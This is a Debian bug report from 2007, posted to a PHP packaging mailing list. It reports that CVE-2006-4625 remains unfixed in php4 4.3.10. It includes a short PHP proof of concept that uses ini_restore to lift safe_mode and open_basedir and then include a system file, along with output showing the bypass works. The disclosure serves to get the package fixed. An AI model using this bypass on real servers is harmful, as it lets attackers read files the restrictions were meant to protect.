[php-maint] Bug#424937: libapache2-mod-php4: CVE-2006-4625 not fixed on old stable
Etienne Carriere
digits at rez-gif.supelec.fr
Thu May 17 22:03:46 UTC 2007
Package: libapache2-mod-php4
Version: 4:4.3.10-20
Severity: important
I would like to verify if it is still possible to use the ini_restore
bug on our server . I determined that it is still possible :
<?
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include("/etc/passwdd");
ini_restore("safe_mode");
ini_restore("open_basedir");
include("/etc/passwdd");
?>
gives :
1
/home/webusers/JdR:/usr/share:/tmp
Warning: main(): open_basedir restriction in effect. File(/etc/passwdd)
is not within the allowed path(s): (/home/webusers/JdR:/usr/share:/tmp)
in /home/webusers/JdR/html/test.php on line 4
Warning: main(/etc/passwdd): failed to open stream: Operation not
permitted in /home/webusers/JdR/html/test.php on line 4
Warning: main(): Failed opening '/etc/passwdd' for inclusion
(include_path='.:/usr/share/fpdf:/usr/share/jpgraph/') in
/home/webusers/JdR/html/test.php on line 4
File with the permissions of /etc/passwd
So i think that this security hole is still real in this 4.3
(and the bug is only corrected in 4.4.4 version)
-- System Information:
Debian Release: 3.1
Architecture: amd64 (x86_64)
Kernel: Linux 2.6.14.3n
Locale: LANG=fr_FR at euro, LC_CTYPE=fr_FR at euro (charmap=ISO-8859-15)
Versions of packages libapache2-mod-php4 depends on:
ii apache2-mpm-prefork 2.0.54-5sarge1 traditional model for Apache2
ii libbz2-1.0 1.0.2-7 high-quality block-sorting file co
ii libc6 2.3.2.ds1-22sarge6 GNU C Library: Shared libraries an
ii libcomerr2 1.37-2sarge1 common error description library
ii libdb4.2 4.2.52-18 Berkeley v4.2 Database Libraries [
ii libexpat1 1.95.8-3 XML parsing C library - runtime li
ii libkrb53 1.3.6-2sarge4 MIT Kerberos runtime libraries
ii libmagic1 4.12-1sarge1 File type determination library us
ii libpcre3 4.5-1.2sarge1 Perl 5 Compatible Regular Expressi
ii libssl0.9.7 0.9.7e-3sarge4 SSL shared libraries
ii libzzip-0-12 0.12.83-4 library providing read access on Z
ii mime-support 3.28-1 MIME files 'mime.types' & 'mailcap
ii php4-common 4:4.3.10-20 Common files for packages built fr
ii zlib1g 1:1.2.2-4.sarge.2 compression library - runtime
-- no debconf information
More information about the pkg-php-maint
mailing list